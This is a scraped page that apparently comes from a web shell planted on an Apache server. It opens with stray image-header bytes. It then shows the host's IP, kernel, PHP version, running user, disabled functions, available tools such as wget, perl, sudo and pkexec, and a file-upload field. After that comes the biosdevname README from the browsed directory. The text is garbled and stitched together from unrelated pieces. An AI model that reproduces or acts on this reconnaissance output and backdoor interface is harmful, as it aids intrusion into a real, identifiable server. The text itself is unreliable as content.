????JFIF??x?x????'
Server IP : 79.136.114.73 / Your IP : 3.142.134.67 Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64 User : www-data ( 33) PHP Version : 5.5.9-1ubuntu4.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /usr/share/doc/biosdevname/ |
Upload File : |
biosdevname Copyright (c) 2006, 2007 Dell, Inc. <Matt_Domsch@dell.com> Licensed under the GNU General Public License, Version 2. biosdevname in its simplest form takes a kernel device name as an argument, and returns the BIOS-given name it "should" be. This is necessary on systems where the BIOS name for a given device (e.g. the label on the chassis is "Gb1") doesn't map directly and obviously to the kernel name (e.g. eth0). The distro-patches/sles10/ directory contains a patch needed to integrate biosdevname into the SLES10 udev ethernet naming rules. This also works as a straight udev rule. On RHEL4, that looks like: KERNEL=="eth*", ACTION=="add", PROGRAM="/sbin/biosdevname -i %k", NAME="%c" This makes use of various BIOS-provided tables: PCI Confuration Space PCI IRQ Routing Table ($PIR) PCMCIA Card Information Structure SMBIOS 2.6 Type 9, Type 41, and HP OEM-specific types therefore it's likely that this will only work well on architectures that provide such information in their BIOS.